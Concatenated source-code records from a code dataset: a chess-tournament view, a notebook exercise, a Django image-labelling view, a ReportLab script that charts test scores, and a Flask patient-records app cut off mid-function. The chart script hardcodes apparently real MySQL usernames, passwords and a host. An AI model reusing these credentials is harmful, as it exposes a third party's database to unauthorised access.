False","sub_path":"utils/request_utils.py","file_name":"request_utils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147350267","text":"\n\"\"\"\nObject view\n\"\"\"\nfrom chess.views.listplayers import ListPlayers\nfrom chess.models.tournaments import Tournament\n\nclass CreateTournament:\n\n    \"\"\"\n    This method is used to x\n    \"\"\"\n    def __init__(self, data):\n        self.data = data\n\n    def tournament_properties(self):\n        tournament = {}\n        for tournament_prop in Tournament.prop_tournaments():\n            value = input('Entrez les informations suivantes: {}\\n'.format(tournament_prop))\n            tournament[tournament_prop] = value\n        listplayers = []\n        while len(listplayers)!=4:\n            print(\"Liste des joueurs parmi ceux proposés :\")\n            listplayers_view = ListPlayers(self.data)\n            
choice = listplayers_view.select_player()\n listplayers.append(choice)\n tournament[\"listplayers\"]= listplayers\n return tournament\n\n\n\n def home(self, code_return):\n tournament = {}\n if code_return in (1,2):\n if code_return == 2:\n print(\"Bienvenue dans la page de création de tournois\") \n else:\n print(\"Un tournois du même nom existe déjà, entrez un autre nom\")\n tournament = self.tournament_properties()\n else:\n print(\"Tournois bien ajouté\")\n return tournament\n","sub_path":"chess/views/createtournament.py","file_name":"createtournament.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199261623","text":"# Exercise 5.4: Notebook: Read and write to the notebook\n\n\"\"\"\nThe last exercise in this chapter is the first part of the second multi-part\nassignment of this course, the notebook. In this notebook the user is able to\nadd, read and delete notes from a separate note file \"notebook.txt\".\n\nCreate a program which allows the user to\n(1) Read the contents of the notebook\n(2) Add notes to the file or\n(3) Delete all of the notes.\n\nIf the user selects 1, the entire notebook file is printed to the screen, if 2\nthen the program prompts \"Write a new note: \", and adds the written note as the\nlast line into the file with a trailing line break \"\\n\". If the player selects\n3, the file is emptied and the message \"Notes deleted\" will be shown. Also add\nthe option (4) Quit, which ends the program, printing \"Notebook shutting down,\nthank you.\". With other selections the program prompts \"Incorrect selection\".\nWhen working, the program prints following:\n\"\"\"\n\nwhile True:\n print(\"(1) Read the notebook \\n(2) Add note \\n(3) Empty the notebook \\n(4) Quit\\n\")\n select = int(input(\"Please select one: \"))\n\n if select == 1:\n src = open('notebook.txt', 'r')\n content = src.read()\n print(content)\n src.close()\n elif select == 2:\n src = open('notebook.txt', 'a+')\n note = input(\"Write a new note: \")\n src.write(note+\"\\n\")\n elif select == 3:\n src = open('notebook.txt', 'w').close()\n print(\"Notes deleted.\")\n elif select == 4:\n print(\"Notebook shutting down, thank you.\")\n break\n else:\n print(\"Wrong selection entered!\")\n","sub_path":"Viope/Ex-5/ex5_4.py","file_name":"ex5_4.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641833461","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom polls.models import Image\nfrom urllib.parse import urlparse, parse_qs\nfrom pprint import pprint\nimport os\nfrom .questions import *\nfrom .image import *\n\ncur_image = 0\n# all lower, accepted image extensions list\naccepted_image_extensions = ['.jpg', '.jpeg', '.png']\nfolder_name = 'car-images'\nimages_path = os.path.join(os.getcwd(), folder_name)\n\ndef construct_image_list():\n file_list = os.listdir(images_path)\n img_list = []\n img_id = 0\n for file in file_list:\n if os.path.splitext(file)[-1].lower() in accepted_image_extensions:\n img_list.append({'id' : img_id, 'path' : file})\n img_id = img_id + 1\n return img_list\n\nimage_list = construct_image_list()\nprint(image_list)\n\ndef is_valid(answers):\n qid = START_ID\n while qid != question_ids['END']:\n question = questions[qid]\n answer = answers[question['question_name']]\n if answer < 0:\n return False\n selected_opt = question['options'][answer]\n 
assert selected_opt['val'] == answer\n qid = selected_opt['lead']\n return True\n\ndef read_answers_for_file(fid):\n img = Image.objects.filter(file_id = fid).first()\n if not img:\n return None\n answers = {\n 'binek' : img.answer_binek,\n 'pert' : img.answer_pert,\n 'ic-dis' : img.answer_icdis,\n 'framing' : img.answer_framing,\n 'uzaklik' : img.answer_uzaklik,\n 'cekim-acisi' : img.answer_cekimacisi,\n 'yabanci-cisim' : img.answer_yabancicisim,\n 'gozuken-hasar' : img.answer_gozukenhasar,\n 'birdenfazlaresim' : img.answer_birdenfazlaresim\n }\n if is_valid(answers):\n return answers\n return None\n\ndef save_answers_for_file(fid, answers):\n if not isinstance(fid, int) or fid < 0:\n return;\n\n img = Image.objects.filter(file_id = fid).first()\n if img:\n img.answer_binek = answers[0]\n img.answer_pert = answers[1]\n img.answer_icdis = answers[2]\n img.answer_framing = answers[3]\n img.answer_uzaklik = answers[4]\n img.answer_cekimacisi = answers[5]\n img.answer_yabancicisim = answers[6]\n img.answer_gozukenhasar = answers[7]\n img.answer_birdenfazlaresim = answers[8]\n else:\n img = Image(\n file_id = fid,\n answer_binek = answers[0],\n answer_pert = answers[1],\n answer_icdis = answers[2],\n answer_framing = answers[3],\n answer_uzaklik = answers[4],\n answer_cekimacisi = answers[5],\n answer_yabancicisim = answers[6],\n answer_gozukenhasar = answers[7],\n answer_birdenfazlaresim = answers[8]\n )\n print(\"db insert: \", fid, answers, img)\n img.save()\n return;\n\nvalid_int_list = list(range(-1, 20))\n\ndef index(request):\n # Instead of refreshing the page for every question, now,\n # we render everything and have the client show/hide necessary elements.\n\n image_data = ''\n file_name = '---'\n context = {}\n old_image_id = int(request.GET.get('pimg', '-1'))\n requested_image_id = int(request.GET.get('img', '-1'))\n\n if old_image_id >= 0:\n old_image_answers = [-1]*len(questions)\n for answer_id in range(len(questions)):\n answer_i = request.GET.get(str(answer_id), '-1')\n print(\"answer i : \", answer_i, type(answer_i), (not answer_i))\n if answer_i and int(answer_i) in valid_int_list:\n answer_i = int(answer_i)\n old_image_answers[answer_id] = int(answer_i)\n print(\"old_image_answers: \", old_image_answers)\n save_answers_for_file(int(old_image_id), old_image_answers)\n\n context = {'num_questions' : len(questions), 'cur_file_id' : -1, 'folder_name' : folder_name, 'image_list' : image_list, 'is_new': 1, 'answers' : {}}\n\n if requested_image_id >= 0 and requested_image_id < len(image_list):\n answers = read_answers_for_file(requested_image_id)\n is_new = 1\n if answers:\n is_new = 0\n\n image_data = load_image(\n os.path.join(images_path, image_list[requested_image_id]['path']))\n file_name = image_list[requested_image_id]['path']\n cur_image = requested_image_id\n print(answers)\n context = {**context,\n 'cur_file_id' : requested_image_id,\n 'cur_file_name' : file_name,\n 'image_data' : image_data,\n 'start' : START_ID, 'qa_pairs' : questions,\n 'is_new' : is_new, 'answers' : answers };\n\n return render(request, 'index.html', context)\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197171574","text":"# -------------------------------------------------------------------------------\r\n#\r\n# make_pdf_chart.py\r\n#\r\n# Requires Python, ReportLab, MySqlDb, and a PDF viewer such as Acrobat.\r\n#\r\n# 
-------------------------------------------------------------------------------\r\n\r\n# Python imports\r\nfrom types import *\r\nimport os\r\nimport sys\r\nimport imp\r\n\r\n# Third party imports\r\n# import MySQLdb\r\nimport mysql\r\n\r\nfrom reportlab.pdfgen import canvas\r\nfrom reportlab.lib import colors\r\nfrom reportlab.lib.colors import HexColor, toColor\r\nfrom reportlab.lib.pagesizes import A1\r\nfrom reportlab.lib.units import inch\r\n\r\n# these need to be defined here (globally)\r\nfrom ICHE_HANDOFF.Charts.pantone import pantoneColors\r\n\r\nlegend1_color = '#6989ff'\r\nlegend2_color = '#555555'  # This is the grayscale version\r\nlegend3_color = '#999999'  # This is the grayscale version\r\n\r\n\r\ndef __import__(name, globals=None, locals=None, fromlist=None):\r\n    # Fast path: see if the module has already been imported.\r\n    try:\r\n        return sys.modules[name]\r\n    except KeyError:\r\n        pass\r\n\r\n    # If any of the following calls raises an exception,\r\n    # there's a problem we can't handle -- let the caller handle it.\r\n\r\n    fp, pathname, description = imp.find_module(name)\r\n\r\n    try:\r\n        return imp.load_module(name, fp, pathname, description)\r\n    finally:\r\n        # Since we may exit via an exception, close fp explicitly.\r\n        if fp:\r\n            fp.close()\r\n    #\r\n\r\n\r\n#\r\n\r\n# End __import__()\r\n\r\n\r\ndef GetDbScores(score_type, test_year):\r\n    if not score_type in ['ICHE_2yr', 'ICHE_1yr']:\r\n        print('If pulling scores from the ICHE database, you must use one of \"ICHE_2yr\", \"ICHE_1yr\".')\r\n        print('These are case-sensitive')\r\n        sys.exit(1)\r\n    #\r\n\r\n    compositeSum = vocabularySum = readingSum = languageSum = mathematicsSum = sourcesSum = 0\r\n    studentNum = 0\r\n    numSummedStudents = 0\r\n\r\n    # db = MySQLdb.connect( host = \"net.iche-idaho.org\", user = \"sugarloaf6160\",\r\n    #\t\t\t\t\t\t\t passwd = \"goldm1ning4fun\", db = \"ichetemp\")\r\n    # db = MySQLdb.connect( host = \"net.iche-idaho.org\", user = \"iche\",\r\n    #\t\t\t\t\t\t\t passwd = \"s1lvercreek\", db = \"icherstest\")\r\n\r\n    import mysql.connector\r\n    from mysql.connector import Error\r\n    from ICHE_HANDOFF import orm  # needed before the per-student loop below\r\n\r\n    connection_config_dict = {\r\n        'user': 'iche',\r\n        'password': 's1lvercreek',\r\n        'host': 'net.iche-idaho.org',\r\n        'database': 'icherstest',\r\n        'raise_on_warnings': True,\r\n        'use_pure': False,\r\n        'autocommit': True,\r\n        'pool_size': 5\r\n    }\r\n    try:\r\n        connection = mysql.connector.connect(**connection_config_dict)\r\n\r\n        cursor = connection.cursor()\r\n\r\n        cursor.execute(\"SELECT * from score_student_data limit 0, 6000\")\r\n        student_data = cursor.fetchall()\r\n    except Error as e:\r\n        print(\"Error while connecting to MySQL\", e)\r\n        sys.exit(1)\r\n    # NOTE: the connection must stay open here; the per-student queries below reuse this cursor.\r\n\r\n    if score_type == 'ICHE_2yr':\r\n        where_years = '> 1'\r\n    else:\r\n        where_years = '= 1'\r\n    #\r\n\r\n    numTotalStudents = len(student_data)\r\n\r\n    for row in student_data:\r\n        student = orm.score_student_data(row)\r\n\r\n        query_str = \"SELECT * from testing_history where test_year = \" + str(test_year) + \\\r\n                    \" and testing_history_id = \" + str(student.testing_history_id) + \\\r\n                    \" and years_hs \" + where_years + \" limit 0, 6000\"\r\n        cursor.execute(query_str)\r\n        testhist_data = cursor.fetchall()\r\n\r\n        if len(testhist_data) == 0:\r\n            print('ERROR: Failed to get testing history for', student.f_name, student.l_name)\r\n            studentNum += 1\r\n            continue\r\n        #\r\n\r\n        th = 
orm.testing_history(testhist_data[0])\r\n\r\n        if (th.years_hs > 1 and score_type == 'ICHE_1yr') \\\r\n                or (th.years_hs == 1 and score_type == 'ICHE_2yr'):\r\n            print(\"Skipping student\", studentNum, \"of\", numTotalStudents, \"due to number of home-school years (\",\r\n                  th.years_hs, \") not as requested\")\r\n            studentNum += 1\r\n            continue\r\n        #\r\n\r\n        cursor.execute(\"SELECT * from score_npr where score_id = \" + str(student.score_id) + \" limit 0, 6000\")\r\n        score_npr_data = cursor.fetchall()\r\n\r\n        compositeSum += score_npr_data[0][24]\r\n        vocabularySum += score_npr_data[0][1]\r\n        readingSum += score_npr_data[0][3]\r\n        languageSum += score_npr_data[0][10]\r\n        mathematicsSum += score_npr_data[0][15]\r\n        sourcesSum += score_npr_data[0][22]\r\n\r\n        studentNum += 1\r\n        numSummedStudents += 1\r\n        print(score_type, \"; Processed student\", studentNum, \"of\", numTotalStudents)\r\n    #\r\n\r\n    compositeAvg = compositeSum / numSummedStudents\r\n    vocabularyAvg = vocabularySum / numSummedStudents\r\n    readingAvg = readingSum / numSummedStudents\r\n    languageAvg = languageSum / numSummedStudents\r\n    mathematicsAvg = mathematicsSum / numSummedStudents\r\n    sourcesAvg = sourcesSum / numSummedStudents\r\n\r\n    return [compositeAvg, vocabularyAvg, readingAvg, languageAvg, mathematicsAvg,\r\n            sourcesAvg], numTotalStudents, numSummedStudents\r\n\r\n\r\n# End GetDbScores()\r\n\r\n\r\ndef SetChartFillColor(c, color):\r\n    if isinstance(color, (tuple, list)):\r\n        bHundredMax = False\r\n        for n in color:\r\n            if n > 1:\r\n                bHundredMax = True\r\n                break\r\n            #\r\n        #\r\n        if bHundredMax:\r\n            adjColors = []\r\n            for n in color:\r\n                newColor = n / 100.0\r\n                adjColors.append(newColor)\r\n            #\r\n            usedColors = adjColors\r\n        else:\r\n            usedColors = color\r\n        #\r\n    else:\r\n        if isinstance(color, str):\r\n            lcColor = color.lower()\r\n            if lcColor[0:3] == 'pms':\r\n                pmsColor = int(lcColor[3:])\r\n                cmykColors = pantoneColors[pmsColor]\r\n\r\n                adjColors = []\r\n                for n in cmykColors:\r\n                    newColor = n / 100.0\r\n                    adjColors.append(newColor)\r\n                #\r\n                usedColors = adjColors\r\n\r\n            elif lcColor[0] == 'p':\r\n                pmsColor = int(lcColor[1:])\r\n                cmykColors = pantoneColors[pmsColor]\r\n\r\n                adjColors = []\r\n                for n in cmykColors:\r\n                    newColor = n / 100.0\r\n                    adjColors.append(newColor)\r\n                #\r\n                usedColors = adjColors\r\n            else:\r\n                usedColors = color\r\n            #\r\n        else:\r\n            usedColors = color\r\n        #\r\n    #\r\n\r\n    c.setFillColor(toColor(usedColors))\r\n\r\n\r\n# End SetChartFillColor()\r\n\r\n\r\ndef Legend(c, x, y, color, desc, fontSize):\r\n    '''\r\n\tDraws a colored box and descriptive text at the given location.\r\n\t'''\r\n    c.setStrokeColor('black')  # Outline Color\r\n\r\n    SetChartFillColor(c, color)\r\n    # c.setFillColor( toColor(color) )\r\n\r\n    c.setLineWidth(1)\r\n    height = fontSize * 0.7\r\n    width = height * 1.618  # The Golden Ratio\r\n    c.rect(x - fontSize / 10, y, width, height, stroke=1, fill=1)  # x, y, width, height, stroke=1, fill=0\r\n\r\n    c.setFont(\"Times-Roman\", fontSize)\r\n    c.setFillColor('black')  # Text color\r\n    horizSpacer = width + height\r\n    c.drawString(x + horizSpacer, y, desc)\r\n\r\n\r\n# End Legend()\r\n\r\n\r\ndef MakePdfChart(datafile, outfile):\r\n    '''\r\n\tReads the user-named data file and potentially the ICHE database.\r\n\tGenerates a PDF chart and saves it in the specified file.\r\n\t'''\r\n\r\n    # Make an A1-size canvas. 
It scales down properly when printing on smaller paper.\r\n pagesize = (max(A1), min(A1))\r\n c = canvas.Canvas(outfile, pagesize)\r\n\r\n # Make a border at 1/2 inch margins\r\n width, height = pagesize\r\n c.setLineWidth(3)\r\n c.rect(36, 36, width - 72, height - 72, stroke=1, fill=0) # x, y, width, height, stroke, fill\r\n\r\n # Import the data file\r\n data = __import__(datafile.split('.')[0])\r\n if data.chart_3D:\r\n bFlatChart = False\r\n else:\r\n bFlatChart = True\r\n #\r\n\r\n # Title\r\n c.setFont(\"Times-Roman\", 48) # 48\r\n c.drawCentredString(width / 2, height * .950, data.title)\r\n\r\n c.setFont(\"Times-Roman\", 28) # 28, 30, 32\r\n c.drawCentredString(width / 2, height * .920, data.subtitle1)\r\n c.drawCentredString(width / 2, height * .900, data.subtitle2)\r\n if len(data.subtitle4.strip()) == 0:\r\n c.setFont(\"Times-Roman\", 32) # 32, 34, 36\r\n c.drawCentredString(width / 2, height * .880, data.subtitle3)\r\n else:\r\n c.drawCentredString(width / 2, height * .880, data.subtitle3)\r\n c.setFont(\"Times-Roman\", 32) # 32, 34, 36\r\n c.drawCentredString(width / 2, height * .860, data.subtitle4)\r\n #\r\n\r\n # Comments\r\n c.setFont(\"Times-Roman\", 28) # 28, 30, 32\r\n c.drawString(300, 240, data.comment1)\r\n c.drawString(300, 215, data.comment2)\r\n\r\n # Legends\r\n Legend(c, 300, 160, legend1_color, data.legend1_text, 28) # 28, 30, 32\r\n Legend(c, 300, 130, legend2_color, data.legend2_text, 28)\r\n Legend(c, 300, 100, legend3_color, data.legend3_text, 28)\r\n\r\n # Bar chart\r\n c.setLineWidth(3)\r\n rwidth = width * 0.8\r\n rheight = height * 0.6\r\n x = width * 0.1\r\n y = height * 0.21\r\n\r\n barWidth = width * 0.025\r\n if not bFlatChart:\r\n x += barWidth / 2\r\n #\r\n\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n c.setStrokeColor('black')\r\n\r\n if bFlatChart:\r\n c.rect((width - rwidth) / 2, y, rwidth, rheight, stroke=1, fill=0) # x, y, width, height, stroke, fill\r\n else:\r\n c.rect(((width - rwidth) / 2) + barWidth / 2, y, rwidth, rheight, stroke=1,\r\n fill=0) # x, y, width, height, stroke, fill\r\n #\r\n\r\n if bFlatChart:\r\n pass\r\n else:\r\n c.setFillColor('lightgrey')\r\n rtSide = x + rwidth\r\n\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n c.setStrokeColor('black')\r\n # Bottom\r\n p = c.beginPath()\r\n p.moveTo(rtSide, y)\r\n p.lineTo(rtSide - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x, y)\r\n p.lineTo(rtSide, y)\r\n c.drawPath(p, fill=1)\r\n\r\n # Left\r\n p = c.beginPath()\r\n p.moveTo(x, y)\r\n p.lineTo(x, y + rheight)\r\n p.lineTo(x - barWidth / 3, y + rheight - barWidth / 3)\r\n p.lineTo(x - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x, y)\r\n c.drawPath(p, fill=1)\r\n #\r\n\r\n chart_data = \\\r\n [\r\n (50, 50, 50, 50, 50, 50),\r\n (50, 50, 50, 50, 50, 50),\r\n (50, 50, 50, 50, 50, 50),\r\n ('Composite', 'Vocabulary', 'Reading', 'Language', 'Mathematics', 'Sources')\r\n ]\r\n colors = [legend1_color, legend2_color, legend3_color]\r\n\r\n # Potentially get data from the ICHE database\r\n if data.scores1 is str:\r\n scores_list, numTotalStudents1, numSummedStudents1 = GetDbScores(data.scores1, data.test_year)\r\n chart_data[0] = scores_list\r\n else:\r\n chart_data[0] = data.scores1\r\n #\r\n\r\n if data.scores2 is str:\r\n scores_list, numTotalStudents2, numSummedStudents2 = GetDbScores(data.scores2, data.test_year)\r\n chart_data[1] = scores_list\r\n else:\r\n chart_data[1] = data.scores2\r\n #\r\n\r\n if data.scores3 is str:\r\n scores_list, numTotalStudents3, numSummedStudents3 = 
GetDbScores(data.scores3, data.test_year)\r\n chart_data[2] = scores_list\r\n else:\r\n chart_data[2] = data.scores3\r\n #\r\n\r\n c.setStrokeColor('black') # Line color\r\n c.setFillColor('black') # Text color\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n\r\n yAxisLabelStep = 10\r\n yAxisStep = rheight / 6\r\n yAxisFloor = 40\r\n\r\n # Y Axis labels and horizontal mid-chart lines\r\n c.setLineWidth(1)\r\n if bFlatChart:\r\n yAxisLabelXoffset = 0.02\r\n yAxisLabelYoffset = 0\r\n else:\r\n yAxisLabelXoffset = 0.025\r\n yAxisLabelYoffset = barWidth / 3\r\n #\r\n for i in range(6):\r\n c.drawString(x - width * yAxisLabelXoffset,\r\n (y + (yAxisStep * i)) - (height * 0.004) - yAxisLabelYoffset,\r\n str(yAxisFloor + (yAxisLabelStep * i)))\r\n\r\n c.line(x, y + (yAxisStep * i), x + rwidth, y + (yAxisStep * i))\r\n\r\n if not bFlatChart:\r\n c.line(x - barWidth / 3, y + (yAxisStep * i) - barWidth / 3, x, y + (yAxisStep * i))\r\n #\r\n #\r\n\r\n if bFlatChart:\r\n clusterSpacing = barWidth * 1.5\r\n else:\r\n clusterSpacing = barWidth * 2\r\n #\r\n\r\n numClusters = len(chart_data[0])\r\n barsPerCluster = len(chart_data) - 1\r\n chartWidth = numClusters * ((barsPerCluster * barWidth) + clusterSpacing) - clusterSpacing\r\n if bFlatChart:\r\n barX = (width - chartWidth) / 2\r\n else:\r\n barX = ((width - chartWidth) / 2) + barWidth / 2\r\n #\r\n\r\n c.setLineWidth(1)\r\n for clusterNum in range(len(chart_data[0])):\r\n # print 'clusterNum', clusterNum\r\n\r\n for barNum in range(len(chart_data)):\r\n # print 'barNum', barNum\r\n\r\n if barNum < 3:\r\n color = colors[barNum]\r\n SetChartFillColor(c, color)\r\n\r\n value = chart_data[barNum][clusterNum]\r\n barHeight = value - yAxisFloor\r\n\r\n # Normalize the bar height to the chart height\r\n barHeight = (barHeight * rheight) / (100 - yAxisFloor)\r\n\r\n # Draw the bar\r\n if bFlatChart:\r\n # Flat Bar\r\n c.rect(barX, y, barWidth, barHeight, stroke=1, fill=1) # x, y, width, height, stroke, fill\r\n\r\n else:\r\n # 3D Bar\r\n SetChartFillColor(c, color)\r\n c.setStrokeColor('black')\r\n c.setLineWidth(1)\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n\r\n # Front\r\n c.rect(barX - barWidth / 3, y - barWidth / 3, barWidth, barHeight, stroke=1, fill=1)\r\n\r\n # Top\r\n p = c.beginPath()\r\n p.moveTo(barX, y + barHeight)\r\n p.lineTo(barX + barWidth, y + barHeight)\r\n p.lineTo(barX + barWidth - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX, y + barHeight)\r\n c.drawPath(p, fill=1)\r\n\r\n # Right side\r\n p = c.beginPath()\r\n p.moveTo(barX + barWidth - barWidth / 3,\r\n y - barWidth / 3) # + barWidth/3 to override colored line immediately above\r\n p.lineTo(barX + barWidth - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX + barWidth, y + barHeight)\r\n p.lineTo(barX + barWidth, y)\r\n p.lineTo(barX + barWidth - barWidth / 3, y - barWidth / 3)\r\n c.drawPath(p, fill=1)\r\n\r\n # Adjust position for drawing value square below\r\n barX = barX - barWidth / 3\r\n barHeight = barHeight - barWidth / 3\r\n #\r\n\r\n # Draw the var value square\r\n c.setFillColor('white')\r\n c.rect(barX + (barWidth * 0.15), y + barHeight - (barWidth * .85),\r\n barWidth * 0.7, barWidth * 0.7, stroke=1, fill=1) # x, y, width, height, stroke, fill\r\n\r\n # Draw the bar value\r\n c.setFillColor('black')\r\n valueXoffset = width * 0.0058\r\n valueYoffset = height * 0.023\r\n c.drawString(barX + valueXoffset, y + barHeight - valueYoffset, str(value))\r\n\r\n if barNum == 0:\r\n nameX = 
barX + barWidth / 2\r\n #\r\n\r\n if bFlatChart:\r\n # Flat Bar\r\n barX += barWidth\r\n else:\r\n # 3D Bar\r\n barX += (barWidth + barWidth / 3)\r\n #\r\n else:\r\n c.setFont(\"Times-Roman\", 34) # Font family, size\r\n\r\n name = chart_data[3][clusterNum]\r\n\r\n if bFlatChart:\r\n c.drawString(nameX, y - height * 0.02, name)\r\n else:\r\n c.drawString(nameX, y - barWidth / 3 - height * 0.02, name)\r\n #\r\n #\r\n #\r\n barX += clusterSpacing\r\n #\r\n\r\n # Generate PDF and save file\r\n c.showPage()\r\n c.save()\r\n\r\n print\r\n if data.scores1 is str:\r\n print('There were', numSummedStudents1, 'of', numTotalStudents1, 'students for', data.scores1)\r\n #\r\n\r\n if data.scores2 is str:\r\n print('There were', numSummedStudents2, 'of', numTotalStudents2, 'students for', data.scores2)\r\n #\r\n\r\n if data.scores3 is str:\r\n print('There were', numSummedStudents3, 'of', numTotalStudents3, 'students for', data.scores3)\r\n #\r\n\r\n print(\"Generated PDF chart\")\r\n\r\n\r\n# End MakePdfChart()\r\n\r\n\r\nif __name__ == '__main__':\r\n # only takes one parameter (color or nothing for black and white (default))\r\n param1 = sys.argv[1]\r\n\r\n if param1 == 'color':\r\n color = True\r\n else:\r\n color = False\r\n\r\n outpath = './output/'\r\n\r\n datafile1 = 'sdc_config.py'\r\n\r\n if color == True:\r\n outfile = 'sdc_chart.pdf'\r\n else:\r\n outfile = 'sdc_chart_bw.pdf'\r\n\r\n path_outfile1 = os.path.join(outpath, outfile)\r\n\r\n datafile2 = 'trc_config.py'\r\n\r\n if color == True:\r\n outfile = 'trc_chart.pdf'\r\n else:\r\n outfile = 'trc_chart_bw.pdf'\r\n\r\n path_outfile2 = os.path.join(outpath, outfile)\r\n\r\n datafile3 = 'tra_config.py'\r\n\r\n if color == True:\r\n outfile = 'tra_chart.pdf'\r\n else:\r\n outfile = 'tra_chart_bw.pdf'\r\n\r\n path_outfile3 = os.path.join(outpath, outfile)\r\n\r\n # Set light and dark values. 
The third bar will be shaded 1/2 way in the middle.\r\n lightgray = 90 # Using percentage (0-100) method\r\n darkgray = 40\r\n if not color:\r\n # medgray = 65\r\n # legend1_color = (medgray, medgray, medgray)\r\n # legend2_color = (lightgray, lightgray, lightgray)\r\n # legend3_color = (darkgray, darkgray, darkgray)\r\n legend1_color = '#999999'\r\n legend2_color = '#c4c4c4' # This is the grayscale version\r\n legend3_color = \"#555555\"\r\n else:\r\n legend1_color = '#6989ff'\r\n legend2_color = '#555555' # This is the grayscale version\r\n legend3_color = '#999999' # This is the grayscale version\r\n\r\n try:\r\n os.mkdir(outpath)\r\n except:\r\n pass\r\n\r\n MakePdfChart(datafile1, path_outfile1)\r\n MakePdfChart(datafile2, path_outfile2)\r\n MakePdfChart(datafile3, path_outfile3)\r\n\r\n # Display the newly-generated charts!\r\n# os.chdir(outpath)\r\n# os.system(outfile)\r\n\r\n# End main\r\n\r\n\r\n# EOF\r\n","sub_path":"Charts/make_pdf_chart.py","file_name":"make_pdf_chart.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"380265825","text":"# USING LIBRARY #\nimport os\nimport sqlite3\nfrom flask import Flask, request ,send_from_directory, session, g, redirect, url_for, render_template\\\n ,request, flash, abort\nfrom contextlib import closing\nfrom werkzeug import secure_filename , SharedDataMiddleware\n\n# INIT APP #\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_pyfile('CONFIG', silent = True)\napp.add_url_rule('/static/', 'uploaded_file',build_only=True)\napp.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/static': app.config['UPLOAD_FOLDER']})\n\n# EXT \nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n# DATABASE #\ndef connect_db(): \n return sqlite3.connect(app.config['DATABASE'])\n# INIT DB #\n\ndef init_db():\n with closing (connect_db()) as db:\n with app.open_resource('schema.sql',mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n flash('Init DB completed.')\n\n# QUERY DB #\ndef query_db(query, args=(), one=False):\n cur = connect_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n# REQUEST # \n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n# SHOW PATIENT #\n@app.route('/')\ndef show_patients():\n cur = g.db.execute('select id, name, phone, address, sex, firstVisit from patients order by id asc')\n patients = [ dict( Id=row[0] ,name=row[1], phone=row[2], address=row[3], sex=row[4], firstVisit=row[5] ) \\\n for row in cur.fetchall() ]\n \n session.mode = 'SHOW'\n return render_template ('show_patients.html', patients = patients )\n\n# LOGIN #\n@app.route('/login', methods = ['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n if request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash ('You were logged in.')\n return redirect (url_for ('show_patients'))\n return render_template ('login.html', error = error )\n\n# LOGOUT #\n@app.route ('/logout') \ndef logout():\n session.pop('logged_in', None)\n flash ('You were logged out.')\n return redirect (url_for ('show_patients'))\n\n# ADD PATIENT #\n@app.route('/add_patient')\ndef 
add_patient():\n if not session.get('logged_in'): abort(401)\n #flash ('Add new patient')\n return render_template ('add_patient.html')\n\n# ADD PATIENT EVENT #\n@app.route('/add_patient_event', methods = ['POST'])\ndef add_patient_event():\n if not session.get('logged_in'): abort(401)\n g.db.execute ('insert into patients (name, sex, birthday, phone, address, reason, firstVisit) values ( ? , ? , ? , ? , ? , ? , ? )',\n [request.form['name'], \\\n request.form['sex'],\\\n request.form['birthday'],\\\n request.form['phone'],\\\n request.form['address'],\\\n request.form['reason'],\\\n request.form['firstVisit']])\n g.db.commit()\n flash('New Patient was successfully recorded.')\n return redirect (url_for ('show_patients'))\n\n# Edit Patient PAGE #\n@app.route('/edit_patient')\ndef edit_patient():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n cur = query_db ('select id, name, sex, birthday, phone, address, reason, firstVisit from patients where id = ?', [ Id ], True)\n if cur is None:\n flash ('Cur is None.')\n return redirect (url_for ('show_patients'))\n else:\n session.mode = 'EDIT'\n patients = dict ( Id = cur[0],\\\n name = cur[1],\\\n sex = cur[2],\\\n birthday= cur[3],\\\n phone= cur[4],\\\n address= cur[5],\\\n reason= cur[6],\\\n firstVisit= cur[7] ) \n #flash ('Test Data: Obj-Id: ' + str(cur[2]))\n return render_template ('edit_patient.html', patient=patients)\n\n# Edit Patient Event #\n@app.route('/edit_patient_event', methods = ['POST'])\ndef edit_patient_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('update patients set name = ? , sex = ? , birthday = ? , phone = ? ,\\\n address = ? , reason = ? , firstVisit = ? where id = ? ',\n [request.form['name'], \\\n request.form['sex'],\\\n request.form['birthday'],\\\n request.form['phone'],\\\n request.form['address'],\\\n request.form['reason'],\\\n request.form['firstVisit'],\\\n Id])\n g.db.commit()\n session.mode = 'SHOW'\n flash('Saved Successfully.')\n return redirect (url_for ('show_patients'))\n\n# DELETE PATIENT EVENT #\n@app.route('/delete_patient_event')\ndef 